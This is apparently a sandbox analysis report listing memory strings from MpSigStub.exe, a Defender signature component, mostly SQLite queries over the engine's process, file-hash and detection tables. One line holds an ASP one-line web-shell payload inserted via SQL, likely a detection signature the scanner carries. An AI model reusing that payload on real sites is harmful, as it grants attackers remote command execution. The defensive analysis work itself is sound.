Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID, PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High FROM BmProcessInfo WHERE PPIDHash = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AutoFeatureControl(Key, CurrCount, MaxCount, InstanceTimeStamp) VALUES (?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AtomicCounters ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(20, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE PersistId = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AtomicCounters WHERE AtomicCounters.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(18, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmProcessInfo WHERE PPIDHash = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AnomalyInfo;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ValueMapArrayBlob FROM ValueMapArray WHERE Key = ? AND RecordType = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributeCounts WHERE AttributeCounts.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;SELECT Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision FROM DynSigRevisions WHERE Key = ?SELECT Count(1) FROM DynSigRevisions;SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributeCounts ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM ValueMapArray WHERE ValueMapArray.Key = ? AND ValueMapArray.RecordType = ?;
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AtomicCounters; SELECT Key FROM AtomicCounters ORDER BY InsertTime ASC LIMIT 1; SELECT Key, Name, Count, InsertTime, ExpireTime FROM AtomicCounters WHERE Key = ?; DELETE FROM AtomicCounters; DELETE FROM AtomicCounters WHERE ExpireTime < ?; DELETE FROM AtomicCounters WHERE AtomicCounters.Key = ?; SELECT Key FROM AtomicCounters WHERE AtomicCounters.Key = ?; UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?; INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(21, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime FROM AtomicCounters WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BmFileInfo;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AtomicCounters;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(17, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmHipsRuleInfo(ProcessInfoId, RuleAction, RuleId, IsAudit, IsInherited, State) VALUES (?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp FROM ProcessBlockHistory ORDER BY TimeStamp ASC LIMIT 1REPLACE INTO ProcessBlockHistory(ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity) VALUES (?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM ProcessBlockHistory WHERE TimeStamp < ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;DELETE FROM ProcessBlockHistory;SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;SELECT COUNT(1) FROM ProcessBlockHistory;SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? 
ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;[3
Source: MpSigStub.exe, 00000023.00000003.18327831413.0000015B1A891000.00000004.00000001.sdmp Binary or memory string: SELECT information FROM tdata where dataname = '%s' and g_name = '%s';
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO ProcessInfo(FileName, ProcessId, CommandLine, StartTime, TokenElevation, TokenElevationType, IntegrityLevel) VALUES(? , ? , ? , ? , ? , ? , ? );
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE ID = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(19, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM NetworkIpFirewallRules WHERE NetworkIpFirewallRules.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BackupProcessInfo(Key, FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(22, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM RansomwareDetections WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SdnEx WHERE SdnEx.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(29, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileStartupActions(FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);SELECT ID FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;SELECT FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId FROM BmFileStartupActions WHERE FilePathHash = ?DELETE FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;SELECT Count(1) FROM BmFileStartupActions;|
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SystemRegistryCache WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AttributeCounts;
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp Binary or memory string: insertinto[bin_cmd](cmd)values('<%execute(request(chr(35)))%>')
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM AmsiFileCache;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SystemRegistryCache(Key, FileIDHash, RegPath, RegOperation, NewRegType, OldRegType, OldRegData, NewRegData, InstanceTimeStamp) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime, UpdateTime) VALUES(? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO File(SHA1, MD5, lshashs, lshash, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n, Size, SHA256) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?, ?, ? );
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(30, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(23, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM RollingQueuesValues;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(15, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(10, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmProcessInfo(PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High)VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BackupProcessInfo;
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: SELECT Key, FilePath, Context, InsertTime, ExpireTime FROM AttributePersistContext WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT FileInstance.ID FROM FileInstance, RecordIdentifier WHERE FileInstance.RecordID = RecordIdentifier.ID AND RecordIdentifier.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ?;SELECT COUNT(1) FROM ProcessBlockHistory;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? 
ORDER BY TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE TimeStamp < ?;SELECT ProcessPath, TimeStamp FROM ProcessBlockHistory ORDER BY TimeStamp ASC LIMIT 1SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;REPLACE INTO ProcessBlockHistory(ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity) VALUES (?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM ProcessBlockHistory;[3
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT RecordIdentifier.Key, FileInstance.RecordID, RecordIdentifier.RecordTimeStamp, FileInstance.TrackingEnabled, FileInstance.StorageEvent, FileInstance.StorageEventState, FileInstance.ModificationsCount, FileInstance.ParentRecordID, FileInstance.Parent_FileEvent, FileInstance.Parent_FileName, RecordIdentifier.Generation, FileInstance.FileName, FileInstance.USN, FileInstance.CreateTime, FileInstance.LastAccessTime, FileInstance.LastWriteTime, FileInstance.Signer, FileInstance.SignerHash, FileInstance.Issuer, FileInstance.SigningTime, FileInstance.MOTW, FileInstance.MOTWFromParent, FileInstance.IsValidCert, FileInstance.CertInvalidDetails, FileInstance.IsCatalogSigned, File.SHA1, File.MD5, File.lshashs, File.lshash, File.PartialCRC1, File.PartialCRC2, File.PartialCRC3, File.KCRC1, File.KCRC2, File.KCRC3, File.KCRC3n, File.Size, File.SHA256, ParentProcessInfo.CommandLine, ParentProcessInfo.FileName, ParentProcessInfo.IntegrityLevel, ParentProcessInfo.ProcessId, ParentProcessInfo.StartTime, ParentProcessInfo.TokenElevation, ParentProcessInfo.TokenElevationType, RemoteProcessInfo.CommandLine, RemoteProcessInfo.FileName, RemoteProcessInfo.IntegrityLevel, RemoteProcessInfo.TokenElevation, RemoteProcessInfo.TokenElevationType, ScanInfo.NamedAttributes, ScanInfo.PeAttributes, ScanInfo.PersistSigSeq, ScanInfo.ProgenitorPersistSigSeq, ScanInfo.ScanAgent, ScanInfo.ScanReason, ScanInfo.SigAttrEvents, ScanInfo.SigSeq, ScanInfo.SigSha, ScanInfo.WebURL,Engine.EngineVersion, Engine.SigVersion FROM RecordIdentifier INNER JOIN (FileInstance INNER JOIN File ON FileInstance.FileID = File.ID LEFT OUTER JOIN ProcessInfo as 'ParentProcessInfo' ON FileInstance.Parent_ProcessID = ParentProcessInfo.ID LEFT OUTER JOIN ProcessInfo as 'RemoteProcessInfo' ON FileInstance.Remote_ProcessID = RemoteProcessInfo.ID LEFT OUTER JOIN (ScanInfo INNER JOIN Engine ON ScanInfo.EngineID = 
Engine.ID) ON FileInstance.ScanID = ScanInfo.ID ) ON RecordIdentifier.ID = FileInstance.RecordID WHERE RecordIdentifier.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ?, UpdateTime = ?, WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(9, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM DynSigRevisions;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM ProcessBlockHistory;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BmProcessInfo;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO ValueMapArray(Key, RecordType, ValueMapArrayBlob, InstanceTimeStamp) VALUES(?, ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime FROM AttributeCounts WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM FileHashes;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RecordIdentifier(Key, RecordTimeStamp, Generation) VALUES(?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(27, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FileHashes(Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n) VALUES(?, ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces FROM RansomwareDetections WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO NetworkIpFirewallRules(Key, FirewallRuleName, ExpiryTime) VALUES (?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces FROM BackupProcessInfo WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(7, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;DELETE FROM SystemFileCache WHERE InstanceTimeStamp < ?; SELECT Count(1) FROM SystemFileCache WHERE CleanFileShaHash = ?; INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?; SELECT Count(1) FROM SystemFileCache;DELETE FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;2
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; DELETE FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; SELECT COUNT(1) FROM AttributePersistContext; DELETE FROM AttributePersistContext WHERE ExpireTime < ?; SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1; INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(2, 1, date('now'));
